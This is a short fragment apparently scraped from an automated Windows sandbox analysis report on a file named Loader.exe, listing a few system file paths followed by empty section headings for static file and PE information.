C:\ProgramData\Microsoft\Windows\WER\Temp\WERA31D.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Windows Analysis Report
Loader.exe